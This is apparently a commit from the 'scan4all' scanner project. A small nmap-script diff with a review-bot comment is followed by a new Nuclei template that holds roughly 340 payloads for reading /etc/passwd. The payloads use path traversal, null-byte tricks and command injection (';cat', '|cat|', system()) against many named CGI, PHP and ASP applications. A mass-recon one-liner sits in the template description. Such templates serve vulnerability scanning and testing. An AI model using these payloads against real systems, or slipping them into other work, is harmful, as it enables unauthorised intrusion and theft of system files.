Projects STRLCPY scan4all Commits a0d76c5a
    config/doNmapScan.sh
    skipped 4 lines
    5 5   # -F --top-ports=65535
    6 6   # -p 80,443
    7 7   # -sV 得到的指纹信息更准,但是更慢
    8  - echo $PPSSWWDD|sudo -S nmap -F -sV --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 -iL $1 -oX $2
     8 + echo $PPSSWWDD|sudo -S nmap -F --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 -iL $1 -oX $2
    9 9   else
    10  - echo $PPSSWWDD|sudo -S nmap -F -sV --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 $1 -oX $2
     10 + echo $PPSSWWDD|sudo -S nmap -F --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 $1 -oX $2
    11 11   fi
    12 12  }
    13 13  doMasScan $1 $2
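Review bot: with `-sV` dropped from both nmap invocations (new lines 8 and 10), `--version-intensity 9` is left as a dead option: it only tunes the probe set used by service/version detection and does nothing without `-sV`, so either remove it in the same change or keep `-sV` if version fingerprints are still wanted (the comment on line 7 says they are more accurate but slower, which is presumably why it was removed). Two smaller points on the same lines: `-F` asks for a reduced port set while `--top-ports=65535` asks for every port ranked by frequency, so the intent is unclear and one of the two should go; and `$1`/`$2` are unquoted, so an input list or output path containing whitespace breaks the command. Suggest `-iL "$1" -oX "$2"` and `"$1" -oX "$2"` respectively.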
    skipped 1 lines
    config/nuclei-templates/51pwn/pay001.yaml
     1 +id: logs-passwd
     2 +info:
     3 + name: logs-passwd
     4 + severity: high
     5 + author:
     6 + - 51pwn
     7 + description: |-
     8 + cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
     9 + 
     10 +requests:
     11 + - raw:
     12 + - |
     13 + GET /{{path1}} HTTP/1.1
     14 + Host: {{Hostname}}
     15 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     16 +
     17 + payloads:
     18 + path1:
     19 + - "%00../../../../../../etc/passwd"
     20 + - "%00/etc/passwd%00"
     21 + - "%0a/bin/cat%20/etc/passwd"
     22 + - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
     23 + - "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
     24 + - "................../etc/passwd"
     25 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     26 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     27 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     28 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     29 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     30 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     31 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     32 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     33 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     34 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     35 + - "....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     36 + - "....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
     37 + - "....//....//....//....//....//....//....//....//....//....//etc/passwd"
     38 + - "....//....//....//....//....//....//....//....//....//etc/passwd"
     39 + - "....//....//....//....//....//....//....//....//etc/passwd"
     40 + - "....//....//....//....//....//....//....//etc/passwd"
     41 + - "....//....//....//....//....//....//etc/passwd"
     42 + - "....//....//....//....//....//etc/passwd"
     43 + - "....//....//....//....//etc/passwd"
     44 + - "....//....//....//etc/passwd"
     45 + - "....//....//etc/passwd"
     46 + - "....//etc/passwd"
     47 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     48 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     49 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     50 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     51 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     52 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     53 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     54 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     55 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     56 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     57 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     58 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     59 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     60 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     61 + - ....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
     62 + - ....\/....\/....\/....\/....\/....\/....\/etc/passwd
     63 + - ....\/....\/....\/....\/....\/....\/etc/passwd
     64 + - ....\/....\/....\/....\/....\/etc/passwd
     65 + - ....\/....\/....\/....\/etc/passwd
     66 + - ....\/....\/....\/etc/passwd
     67 + - ....\/....\/etc/passwd
     68 + - ....\/etc/passwd"
     69 + - ".../.../.../.../.../.../.../.../.../.../etc/passwd"
     70 + - "../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
     71 + - "../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
     72 + - "../../../../../../../../../../../../../../../../../../../../../etc/passwd"
     73 + - "../../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
     74 + - "../../../../../../../../../../../../../../../../../../../../etc/passwd"
     75 + - "../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
     76 + - "../../../../../../../../../../../../../../../../../../../etc/passwd"
     77 + - "../../../../../../../../../../../../../../../../../../../etc/passwd%00"
     78 + - "../../../../../../../../../../../../../../../../../../etc/passwd"
     79 + - "../../../../../../../../../../../../../../../../../../etc/passwd%00"
     80 + - "../../../../../../../../../../../../../../../../../etc/passwd"
     81 + - "../../../../../../../../../../../../../../../../../etc/passwd%00"
     82 + - "../../../../../../../../../../../../../../../../etc/passwd"
     83 + - "../../../../../../../../../../../../../../../../etc/passwd%00"
     84 + - "../../../../../../../../../../../../../../../etc/passwd"
     85 + - "../../../../../../../../../../../../../../../etc/passwd%00"
     86 + - "../../../../../../../../../../../../../../etc/passwd"
     87 + - "../../../../../../../../../../../../../../etc/passwd%00"
     88 + - "../../../../../../../../../../../../../etc/passwd"
     89 + - "../../../../../../../../../../../../../etc/passwd%00"
     90 + - "../../../../../../../../../../../../etc/passwd"
     91 + - "../../../../../../../../../../../../etc/passwd%00"
     92 + - "../../../../../../../../../../../etc/passwd"
     93 + - "../../../../../../../../../../../etc/passwd%00"
     94 + - "../../../../../../../../../../etc/passwd"
     95 + - "../../../../../../../../../../etc/passwd%00"
     96 + - "../../../../../../../../../etc/passwd"
     97 + - "../../../../../../../../../etc/passwd%00"
     98 + - "../../../../../../../../etc/passwd"
     99 + - "../../../../../../../../etc/passwd%00"
     100 + - "../../../../../../../etc/passwd"
     101 + - "../../../../../../../etc/passwd%00"
     102 + - "../../../../../../etc/passwd"
     103 + - "../../../../../../etc/passwd%00"
     104 + - "../../../../../../etc/passwd&=%3C%3C%3C%3C"
     105 + - "../../../../../etc/passwd"
     106 + - "../../../../../etc/passwd%00"
     107 + - "../../../../etc/passwd"
     108 + - "../../../../etc/passwd%00"
     109 + - "../../../etc/passwd"
     110 + - "../../../etc/passwd%00"
     111 + - "../../etc/passwd"
     112 + - "../../etc/passwd%00"
     113 + - "../etc/passwd"
     114 + - "../etc/passwd%00"
     115 + - ".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
     116 + - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
     117 + - "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
     118 + - "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
     119 + - "../../../../../../../../../../../etc/passwd%00.html"
     120 + - "../../../../../../../../../../../etc/passwd%00.jpg"
     121 + - "../../../../../../../../../../etc/passwd"
     122 + - "../../../../../../../../../../etc/passwd^^"
     123 + - /..\../..\../..\../..\../..\../..\../etc/passwd
     124 + - "./././././././././././etc/passwd"
     125 + - "//////../../../../../../etc/passwd"
     126 + - "//////../../../etc/passwd"
     127 + - "/etc/passwd"
     128 + - "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/"
     129 + - "cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
     130 + - "cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
     131 + - "etc/passwd"
     132 + - "etc/passwd%00"
     133 + - "etc/passwd-"
     134 + - "etc/passwd~"
     135 + - "logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
     136 + - "src/etc/passwd"
     137 + - "14all-1.1.cgi?cfg=../../../../../../../../etc/passwd"
     138 + - "14all.cgi?cfg=../../../../../../../../etc/passwd"
     139 + - "DomainFiles/*//../../../../../../../../../../etc/passwd"
     140 + - "FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
     141 + - "FileSeek.cgi?head=&foot=;cat%20/etc/passwd"
     142 + - "FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
     143 + - "FileSeek.cgi?head=;cat%20/etc/passwd|&foot="
     144 + - "FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
     145 + - "FileSeek2.cgi?head=&foot=;cat%20/etc/passwd"
     146 + - "FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
     147 + - "FileSeek2.cgi?head=;cat%20/etc/passwd|&foot="
     148 + - "PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00"
     149 + - "PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd"
     150 + - "ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00"
     151 + - "Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html"
     152 + - "YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00"
     153 + - "\\'/bin/cat%20/etc/passwd\\'"
     154 + - "a1disp3.cgi?../../../../../../../../../../etc/passwd"
     155 + - "a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd"
     156 + - "a1stats/a1disp3.cgi?../../../../../../../etc/passwd"
     157 + - "a1stats/a1disp4.cgi?../../../../../../../etc/passwd"
     158 + - "admin.cgi?list=../../../../../../../../../../etc/passwd"
     159 + - "admin/exec.php3?cmd=cat%20/etc/passwd"
     160 + - "admin/system.php3?cmd=cat%20/etc/passwd"
     161 + - "albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd"
     162 + - "anacondaclip.pl?template=../../../../../../../../../../etc/passwd"
     163 + - "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/"
     164 + - "athenareg.php?pass=%20;cat%20/etc/passwd"
     165 + - "atomicboard/index.php?location=../../../../../../../../../../etc/passwd"
     166 + - "auktion.cgi?menue=../../../../../../../../../../etc/passwd"
     167 + - "autohtml.php?op=modload&mainfile=x&name=/etc/passwd"
     168 + - "base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1"
     169 + - "basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu"
     170 + - "bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd"
     171 + - "bb-hist?HISTFILE=../../../../../../../../../../etc/passwd"
     172 + - "bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd"
     173 + - "bigconf.cgi?command=view_textfile&file=/etc/passwd&filters="
     174 + - "book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10"
     175 + - "cal_make.pl?p0=../../../../../../../../../../etc/passwd%00"
     176 + - "calendar/calendar_admin.pl?config=|cat%20/etc/passwd|"
     177 + - "calendar_admin.pl?config=|cat%20/etc/passwd|"
     178 + - "campas?%0acat%0a/etc/passwd%0a"
     179 + - "cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd"
     180 + - "cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd"
     181 + - "cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
     182 + - "cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd"
     183 + - "cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
     184 + - "cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot="
     185 + - "cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
     186 + - "cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd"
     187 + - "cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
     188 + - "cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot="
     189 + - "cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00"
     190 + - "cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd"
     191 + - "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd"
     192 + - "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd"
     193 + - "cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd"
     194 + - "cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd"
     195 + - "cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd"
     196 + - "cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/"
     197 + - "cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd"
     198 + - "cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd"
     199 + - "cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd"
     200 + - "cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd"
     201 + - "cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters="
     202 + - "cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10"
     203 + - "cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00"
     204 + - "cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|"
     205 + - "cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|"
     206 + - "cgi-bin/campas?%0acat%0a/etc/passwd%0a"
     207 + - "cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00"
     208 + - "cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html"
     209 + - "cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd"
     210 + - "cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     211 + - "cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     212 + - "cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     213 + - "cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     214 + - "cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`"
     215 + - "cgi-bin/db4web_c/dbdirname//etc/passwd"
     216 + - "cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00"
     217 + - "cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00"
     218 + - "cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     219 + - "cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     220 + - "cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     221 + - "cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|"
     222 + - "cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
     223 + - "cgi-bin/faqmanager.cgi?toc=/etc/passwd%00"
     224 + - "cgi-bin/faxsurvey?cat%20/etc/passwd"
     225 + - "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
     226 + - "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
     227 + - "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
     228 + - "cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1"
     229 + - "cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|"
     230 + - "cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
     231 + - "cgi-bin/htgrep?file=index.html&hdr=/etc/passwd"
     232 + - "cgi-bin/htmlscript?../../../../../../../../../../etc/passwd"
     233 + - "cgi-bin/htsearch?exclude=%60/etc/passwd%60"
     234 + - "cgi-bin/ion-p?page=../../../../../etc/passwd"
     235 + - "cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd"
     236 + - "cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd"
     237 + - "cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     238 + - "cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00"
     239 + - "cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd"
     240 + - "cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd"
     241 + - "cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd"
     242 + - "cgi-bin/multihtml.pl?multi=/etc/passwd%00html"
     243 + - "cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd"
     244 + - "cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd"
     245 + - "cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     246 + - "cgi-bin/opendir.php?/etc/passwd"
     247 + - "cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd"
     248 + - "cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'"
     249 + - "cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd"
     250 + - "cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'"
     251 + - "cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd"
     252 + - "cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd"
     253 + - "cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20"
     254 + - "cgi-bin/php.cgi?/etc/passwd"
     255 + - "cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd"
     256 + - "cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10"
     257 + - "cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id="
     258 + - "cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd"
     259 + - "cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1"
     260 + - "cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00"
     261 + - "cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd"
     262 + - "cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd"
     263 + - "cgi-bin/shop.cgi?page=../../../../../../../etc/passwd"
     264 + - "cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd"
     265 + - "cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|"
     266 + - "cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|"
     267 + - "cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|"
     268 + - "cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|"
     269 + - "cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
     270 + - "cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html"
     271 + - "cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd"
     272 + - "cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00"
     273 + - "cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00"
     274 + - "cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1"
     275 + - "cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd"
     276 + - "cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd"
     277 + - "cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd"
     278 + - "cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd"
     279 + - "cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00"
     280 + - "cgi-bin/viewsource?/etc/passwd"
     281 + - "cgi-bin/way-board.cgi?db=/etc/passwd%00"
     282 + - "cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00"
     283 + - "cgi-bin/webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd"
     284 + - "cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
     285 + - "cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd"
     286 + - "cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     287 + - "cgi-bin/webplus?script=../../../../../../../../../../etc/passwd"
     288 + - "cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd"
     289 + - "cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
     290 + - "cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
     291 + - "cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
     292 + - "cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00"
     293 + - "cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00"
     294 + - "cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00"
     295 + - "commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html"
     296 + - "common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd"
     297 + - "content/base/build/explorer/none.php?/etc/passwd"
     298 + - "csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     299 + - "csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     300 + - "csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     301 + - "csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
     302 + - "csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`"
     303 + - "current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00"
     304 + - "current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1"
     305 + - "db4web_c/dbdirname//etc/passwd"
     306 + - "dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00"
     307 + - "dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00"
     308 + - "dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00"
     309 + - "directory.php?dir=%3Bcat%20/etc/passwd"
     310 + - "directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00"
     311 + - "edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
     312 + - "emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     313 + - "emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     314 + - "emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00"
     315 + - "emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     316 + - "etc/passwd"
     317 + - "ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1"
     318 + - "ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|"
     319 + - "ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
     320 + - "faqmanager.cgi?toc=/etc/passwd%00"
     321 + - "faxsurvey?cat%20/etc/passwd"
     322 + - "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
     323 + - "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
     324 + - "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
     325 + - "forum-ra.asp?n=../../../../../../../../../etc/passwd"
     326 + - "forum-ra.asp?n=../../../../../../../../../etc/passwd%00"
     327 + - "forum-ra.asp?n=/etc/passwd"
     328 + - "forum-ra.asp?n=/etc/passwd%00"
     329 + - "forum-ra_professionnel.asp?n=%60/etc/passwd%60"
     330 + - "forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00"
     331 + - "forum-ra_professionnel.asp?n=/../../../../../../etc/passwd"
     332 + - "forum-ra_professionnel.asp?n=/../../../etc/passwd"
     333 + - "forum-ra_professionnel.asp?n=/etc/passwd"
     334 + - "forum-ra_professionnel.asp?n=/etc/passwd%00"
     335 + - "forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
     336 + - "forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     337 + - "forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     338 + - "forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     339 + - "forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     340 + - "forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     341 + - "forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     342 + - "forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     343 + - "forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     344 + - "forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     345 + - "forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     346 + - "forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     347 + - "forum1.asp?n=1753&nn=%60/etc/passwd%60"
